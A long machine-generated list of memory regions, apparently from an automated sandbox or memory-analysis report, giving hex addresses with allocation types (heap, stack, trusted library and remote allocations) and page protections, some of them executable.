trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
2D611502000
heap
page read and write
81F0000
unkown
page read and write
7FE0000
trusted library allocation
page read and write
9470000
unkown
page read and write
90A0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
AF0B000
trusted library allocation
page read and write
1C156AF8000
heap
page read and write
81F0000
unkown
page read and write
2CD0000
remote allocation
page read and write
7540000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
91A0000
unkown
page read and write
9120000
trusted library allocation
page read and write
21DD66AF000
heap
page read and write
6E34000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1C156900000
trusted library allocation
page read and write
1C27D213000
heap
page read and write
9230000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
62EE000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
1A55CE02000
heap
page read and write
282676CD000
heap
page read and write
8BA8000
trusted library allocation
page read and write
FC0000
heap
page read and write
ABD597F000
stack
page read and write
8230000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9350000
trusted library allocation
page read and write
5869000
trusted library allocation
page read and write
531F000
stack
page read and write
9300000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
5AAF000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
8200000
unkown
page read and write
6E54000
trusted library allocation
page read and write
75F6000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
9F49000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
5A6C000
trusted library allocation
page read and write
6DD4000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1037000
heap
page read and write
8270000
trusted library allocation
page read and write
2DD9000
heap
page read and write
92B0000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
6E9B000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
1C156990000
remote allocation
page read and write
9F50000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
484A000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
1A55C995000
heap
page read and write
2CE0000
remote allocation
page execute and read and write
90A0000
trusted library allocation
page read and write
80E000
stack
page read and write
9080000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
4838000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
6DBE000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
9B0D97C000
stack
page read and write
80E1000
trusted library allocation
page read and write
4B60000
heap
page read and write
8200000
trusted library allocation
page read and write
6DF1000
trusted library allocation
page read and write
4C90000
trusted library allocation
page read and write
1A55C229000
heap
page read and write
282674D0000
heap
page read and write
5947000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9220000
unkown
page read and write
75D0000
unkown
page read and write
21CB2C5E000
heap
page read and write
4F10000
trusted library allocation
page read and write
4E30000
trusted library allocation
page read and write
2E27000
heap
page read and write
9190000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
5BBF000
trusted library allocation
page read and write
2D611330000
heap
page read and write
90D0000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
4E80000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
C87A4FF000
stack
page read and write
1A55C98C000
heap
page read and write
2E78000
heap
page read and write
7FD5000
trusted library allocation
page read and write
2EFD000
heap
page read and write
9170000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
29D5D464000
heap
page read and write
636D000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
4AD0000
heap
page read and write
7550000
trusted library allocation
page read and write
D00000
heap
page read and write
9540000
trusted library allocation
page read and write
865000
heap
page read and write
F159A7F000
stack
page read and write
75D0000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8FC0000
unkown
page read and write
478F000
stack
page read and write
6E07000
trusted library allocation
page read and write
58B0000
trusted library allocation
page read and write
A000000
trusted library allocation
page read and write
4D00000
heap
page read and write
83EBEFF000
stack
page read and write
90D2000
trusted library allocation
page read and write
1A55C98E000
heap
page read and write
1C156A3C000
heap
page read and write
8290000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
9220000
unkown
page read and write
21CB2C5C000
heap
page read and write
21CB2D00000
heap
page read and write
2CD0000
remote allocation
page read and write
8FF0000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
6E39000
trusted library allocation
page read and write
91A0000
unkown
page read and write
9126000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
4C00000
direct allocation
page read and write
6E03000
trusted library allocation
page read and write
21DD66B3000
heap
page read and write
8DEE000
stack
page read and write
94F0000
trusted library allocation
page read and write
4CEE000
stack
page read and write
9120000
trusted library allocation
page read and write
21DD65C0000
heap
page read and write
4F30000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9140000
trusted library allocation
page read and write
82A0000
unkown
page read and write
1C151313000
heap
page read and write
1086000
heap
page read and write
90E0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
59E000
stack
page read and write
FCA000
heap
page read and write
1C1B0F02000
heap
page read and write
82A0000
trusted library allocation
page read and write
FDE000
heap
page read and write
9120000
trusted library allocation
page read and write
2D611425000
heap
page read and write
9F50000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
2DD0000
heap
page read and write
9120000
trusted library allocation
page read and write
7FD0000
unkown
page read and write
9190000
trusted library allocation
page read and write
1C1512A2000
heap
page read and write
1A55C97E000
heap
page read and write
2EE0000
heap
page read and write
56B0000
trusted library allocation
page read and write
4C62000
direct allocation
page read and write
2CE0000
remote allocation
page execute and read and write
8F30000
trusted library allocation
page read and write
2E30000
heap
page read and write
1F8A6213000
heap
page read and write
9470000
unkown
page read and write
2CD0000
remote allocation
page read and write
4C40000
heap
page read and write
552D000
heap
page read and write
9030000
unkown
page read and write
8F35000
unkown
page read and write
9150000
trusted library allocation
page read and write
6E2A000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
9F20000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
1C152310000
trusted library section
page readonly
C50000
heap
page read and write
9140000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
50504FF000
stack
page read and write
21DD6697000
heap
page read and write
9120000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
92B0000
trusted library allocation
page read and write
75D5000
trusted library allocation
page read and write
1A55CE02000
heap
page read and write
586C000
trusted library allocation
page read and write
81F0000
unkown
page read and write
7381000
heap
page read and write
8220000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
5854000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
A000000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
84E000
stack
page read and write
8F20000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
4FD1000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
4C54000
trusted library allocation
page read and write
4DAA000
heap
page read and write
8230000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
1A55C22C000
heap
page read and write
8C0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8200000
trusted library allocation
page read and write
6DE1000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
6DD2000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
8205000
trusted library allocation
page read and write
21DD66AF000
heap
page read and write
8F20000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
1C1B1602000
trusted library allocation
page read and write
1A55C97D000
heap
page read and write
21CB2C63000
heap
page read and write
91A0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
9540000
unkown
page read and write
6FF3000
trusted library allocation
page read and write
515E000
trusted library allocation
page read and write
4EB0000
heap
page read and write
1C156AF6000
heap
page read and write
2CE0000
remote allocation
page execute and read and write
7100000
trusted library allocation
page read and write
1C27D23C000
heap
page read and write
8210000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
6392000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
C87A77C000
stack
page read and write
9120000
trusted library allocation
page read and write
5953000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
540F000
stack
page read and write
36F0000
trusted library allocation
page read and write
2C61000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
558A000
heap
page read and write
7216000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
89F4000
direct allocation
page read and write
4D3C000
heap
page read and write
6E00000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
947A000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
21DD6698000
heap
page read and write
90B5000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
2F09000
heap
page read and write
7FE5000
unkown
page read and write
2C60000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
1A55C999000
heap
page read and write
9470000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
5966000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
44D0000
remote allocation
page read and write
9220000
trusted library allocation
page read and write
66F5000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
4FC000
stack
page read and write
59BE000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
1A55C995000
heap
page read and write
92E0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
1037000
heap
page read and write
4B05000
heap
page read and write
5A8000
heap
page read and write
6E71000
trusted library allocation
page read and write
1A55C97E000
heap
page read and write
9470000
trusted library allocation
page read and write
520F000
stack
page read and write
9560000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
9245000
trusted library allocation
page read and write
9FD0000
trusted library allocation
page read and write
4C40000
trusted library allocation
page read and write
91A5000
unkown
page read and write
8200000
trusted library allocation
page read and write
4D8F000
heap
page read and write
92A0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
7F90000
trusted library allocation
page read and write
5144000
trusted library allocation
page read and write
9543000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
81F0000
unkown
page read and write
6E44000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
5170000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
49E0000
heap
page read and write
90C0000
trusted library allocation
page read and write
7DFAFFE000
stack
page read and write
6FF0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
2C00000
trusted library allocation
page read and write
1A55C900000
heap
page read and write
9090000
trusted library allocation
page read and write
21DD6960000
heap
page read and write
2DD0000
heap
page read and write
7320000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
9127000
trusted library allocation
page read and write
9150000
unkown
page read and write
9250000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
1A55CE02000
heap
page read and write
9F80000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
81F5000
unkown
page read and write
4E70000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
9F44000
trusted library allocation
page read and write
603E000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
1C156838000
trusted library allocation
page read and write
6E56000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
2C70000
trusted library allocation
page execute and read and write
1A55C2E0000
heap
page read and write
4CA0000
trusted library allocation
page read and write
4B40000
heap
page read and write
5C40000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
6040000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
1A55C974000
heap
page read and write
75D0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9FC0000
trusted library allocation
page read and write
5BBF000
trusted library allocation
page read and write
1A55BFD0000
heap
page read and write
1F8A6308000
heap
page read and write
80EA000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
4B61000
heap
page read and write
9530000
trusted library allocation
page read and write
5D39000
trusted library allocation
page read and write
5A60000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
8E2E000
stack
page read and write
2CE0000
remote allocation
page execute and read and write
75D0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
1C27D0D0000
heap
page read and write
90E0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
934F000
trusted library allocation
page read and write
510F000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
FBD000
heap
page read and write
75D0000
trusted library allocation
page read and write
2C28000
trusted library allocation
page read and write
7F80000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
5C41000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
6E08000
trusted library allocation
page read and write
65BF000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
1C156B00000
heap
page read and write
7220000
trusted library allocation
page read and write
1005000
heap
page read and write
586C000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
4CAD000
stack
page read and write
9540000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
4B6A000
heap
page read and write
5954000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8EF0000
trusted library allocation
page read and write
1C156AFC000
heap
page read and write
56EB000
trusted library allocation
page read and write
50644FE000
stack
page read and write
9F40000
trusted library allocation
page read and write
6E43000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
5956000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9140000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
90A0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
1A55C97F000
heap
page read and write
90B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
AEE000
heap
page read and write
9F50000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
1C27D140000
heap
page read and write
4D6F000
heap
page read and write
6DD8000
trusted library allocation
page read and write
1C27D24E000
heap
page read and write
75D0000
unkown
page read and write
2CD0000
remote allocation
page read and write
4D10000
heap
page read and write
2D61143F000
heap
page read and write
8F80000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
6DFD000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
5ADF000
stack
page read and write
75D0000
unkown
page read and write
90D0000
trusted library allocation
page read and write
618E000
trusted library allocation
page read and write
C87A7FB000
stack
page read and write
555E000
stack
page read and write
9510000
trusted library allocation
page read and write
9FB0000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
5626000
trusted library allocation
page read and write
7FE0000
unkown
page read and write
9F20000
trusted library allocation
page read and write
6E6D000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
1C151200000
heap
page read and write
91B0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
1C1B0D80000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
4CCF000
unkown
page read and write
5A3E000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
4C60000
trusted library allocation
page read and write
56FE000
trusted library allocation
page read and write
4D2D000
heap
page read and write
8160000
trusted library allocation
page read and write
1A55C213000
heap
page read and write
1A55C977000
heap
page read and write
4F70000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1C156870000
trusted library allocation
page read and write
7FE0000
unkown
page read and write
91B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
860000
heap
page read and write
1C152683000
trusted library allocation
page read and write
90F0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
1C156830000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
9FB0000
trusted library allocation
page read and write
5835000
trusted library allocation
page read and write
4C70000
direct allocation
page read and write
75D0000
trusted library allocation
page read and write
58FA000
trusted library allocation
page read and write
59E2000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
7FE4000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
53F9000
stack
page read and write
55AD000
stack
page read and write
9070000
unkown
page read and write
7DFABFB000
stack
page read and write
646C000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1C156990000
trusted library allocation
page read and write
81F5000
unkown
page read and write
5598000
heap
page read and write
59F9000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
52C0000
trusted library allocation
page read and write
1A55C313000
heap
page read and write
2CE0000
remote allocation
page execute and read and write
9F40000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
5CB9000
trusted library allocation
page read and write
1A55CE02000
heap
page read and write
91C0000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
81F0000
unkown
page read and write
2C60000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
2C40000
trusted library allocation
page read and write
8FF5000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
9157000
trusted library allocation
page read and write
6E2E000
trusted library allocation
page read and write
483A000
trusted library allocation
page read and write
9F90000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8EB0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
1F8A61F0000
heap
page read and write
7FE0000
trusted library allocation
page read and write
ABD567B000
stack
page read and write
506407C000
stack
page read and write
5EC1000
trusted library allocation
page read and write
21CB2B50000
heap
page read and write
9560000
trusted library allocation
page read and write
4FAC000
stack
page read and write
8F30000
trusted library allocation
page read and write
7FC0000
trusted library allocation
page read and write
56F6000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
6E81000
trusted library allocation
page read and write
794F000
stack
page read and write
6DD5000
trusted library allocation
page read and write
1C15127C000
heap
page read and write
AA0000
heap
page read and write
9090000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
95A0000
trusted library allocation
page read and write
6E94000
trusted library allocation
page read and write
9390000
trusted library allocation
page read and write
5063F7E000
stack
page read and write
9FB0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
1C156990000
remote allocation
page read and write
9150000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
4C68000
direct allocation
page read and write
E40000
heap
page read and write
5832000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
4F50000
remote allocation
page read and write
9190000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
50DF000
stack
page read and write
6E2D000
trusted library allocation
page read and write
4FB0000
trusted library allocation
page read and write
8A30000
direct allocation
page read and write
82A0000
trusted library allocation
page read and write
8F5C000
trusted library allocation
page read and write
3A0000
remote allocation
page read and write
6E66000
trusted library allocation
page read and write
1A55C98F000
heap
page read and write
75D0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1C156A61000
heap
page read and write
8220000
trusted library allocation
page read and write
4AD8000
heap
page read and write
8EA0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
58DE000
stack
page read and write
2C10000
trusted library allocation
page read and write
5A89000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
5551000
heap
page read and write
9F50000
trusted library allocation
page read and write
5360000
direct allocation
page read and write
7FE0000
unkown
page read and write
8210000
trusted library allocation
page read and write
1C1B0F13000
heap
page read and write
51E7000
heap
page read and write
5E40000
trusted library allocation
page read and write
81F0000
unkown
page read and write
8210000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
59AF000
trusted library allocation
page read and write
7010000
trusted library allocation
page read and write
6DCF000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
93B0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
5A4C000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9180000
trusted library allocation
page read and write
6DE2000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9F90000
trusted library allocation
page read and write
9036000
trusted library allocation
page read and write
553E000
heap
page read and write
500A000
trusted library allocation
page read and write
C87A5FE000
stack
page read and write
2CD0000
remote allocation
page read and write
A000000
trusted library allocation
page read and write
59D6000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
91B0000
trusted library allocation
page read and write
4DE0000
heap
page read and write
7DFA7DF000
stack
page read and write
9120000
trusted library allocation
page read and write
75D0000
unkown
page read and write
4FC000
stack
page read and write
8220000
trusted library allocation
page read and write
1A55C97B000
heap
page read and write
9F40000
trusted library allocation
page read and write
5106000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
4B0D000
heap
page read and write
1A55C98B000
heap
page read and write
9540000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
1A55C9B9000
heap
page read and write
7FE0000
unkown
page read and write
4D73000
heap
page read and write
9090000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
75D0000
unkown
page read and write
7FE5000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
7590000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
7556000
unkown
page read and write
4B28000
heap
page read and write
8EC0000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
4C6D000
trusted library allocation
page execute and read and write
9F41000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
9110000
unkown
page read and write
2E1D000
stack
page read and write
4E10000
trusted library section
page read and write
2CD0000
remote allocation
page read and write
7FE6000
unkown
page read and write
2D2C000
unkown
page read and write
90A0000
trusted library allocation
page read and write
8206000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
ABD577B000
stack
page read and write
91A0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
4D58000
heap
page read and write
9160000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
59D2000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
AEE000
heap
page read and write
50E0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
3A0000
remote allocation
page read and write
990000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
F15977F000
stack
page read and write
2CE0000
remote allocation
page execute and read and write
9F0000
heap
page read and write
8F50000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
1C156A13000
heap
page read and write
8205000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
75C4000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
6C3A000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
4D57000
heap
page read and write
7590000
trusted library allocation
page read and write
7090000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
81F6000
trusted library allocation
page read and write
90D9000
trusted library allocation
page read and write
1A55C997000
heap
page read and write
6DF5000
trusted library allocation
page read and write
1C151B18000
heap
page read and write
9090000
trusted library allocation
page read and write
90C0000
unkown
page read and write
82A0000
trusted library allocation
page read and write
75D0000
unkown
page read and write
8F50000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
4D18000
heap
page read and write
75D0000
trusted library allocation
page read and write
504FBFA000
stack
page read and write
9FA0000
trusted library allocation
page read and write
5AC0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
8810000
trusted library allocation
page read and write
5950000
trusted library allocation
page read and write
1C151290000
heap
page read and write
59D2000
trusted library allocation
page read and write
8EEE000
stack
page read and write
1A55C955000
heap
page read and write
9353000
trusted library allocation
page read and write
559D000
heap
page read and write
6E63000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
2E35000
heap
page read and write
8F20000
trusted library allocation
page read and write
9473000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
28267702000
heap
page read and write
1C1B0E00000
heap
page read and write
21DD6691000
heap
page read and write
75F0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
6E04000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
4848000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
8216000
trusted library allocation
page read and write
5A3E000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
81F0000
unkown
page read and write
90A0000
trusted library allocation
page read and write
6DC9000
trusted library allocation
page read and write
4F60000
unkown
page read and write
4FB0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
1F8A6313000
heap
page read and write
8010000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
513C000
trusted library allocation
page read and write
1A55C97A000
heap
page read and write
90D0000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
75DD000
trusted library allocation
page read and write
75D0000
unkown
page read and write
5A0C000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9276000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
9B0D7F9000
stack
page read and write
1C27D302000
heap
page read and write
9230000
trusted library allocation
page read and write
9100000
unkown
page read and write
9FC0000
trusted library allocation
page read and write
1018000
heap
page read and write
90D0000
unkown
page read and write
AFC000
stack
page read and write
8280000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
75D0000
unkown
page read and write
8EAE000
stack
page read and write
92B0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
5DC0000
trusted library allocation
page read and write
2E1A000
heap
page read and write
6E83000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
504FF7F000
stack
page read and write
C87A9FF000
stack
page read and write
9120000
trusted library allocation
page read and write
1C27D0E0000
heap
page read and write
9290000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
6DDF000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
29D5D340000
heap
page read and write
92B0000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
ABC000
heap
page read and write
89B0000
direct allocation
page read and write
7FEC000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
6E3000
stack
page read and write
7381000
heap
page read and write
9F20000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
687F000
trusted library allocation
page read and write
7080000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
2CD0000
remote allocation
page read and write
6E26000
trusted library allocation
page read and write
81F0000
unkown
page read and write
6E23000
trusted library allocation
page read and write
1A55CD90000
remote allocation
page read and write
1C152300000
trusted library section
page readonly
7FD0000
trusted library allocation
page read and write
28267E02000
heap
page read and write
75C0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
8205000
trusted library allocation
page read and write
597D000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
1F8A6200000
heap
page read and write
4B20000
direct allocation
page read and write
59E3000
trusted library allocation
page read and write
45CD000
stack
page read and write
586C000
trusted library allocation
page read and write
8210000
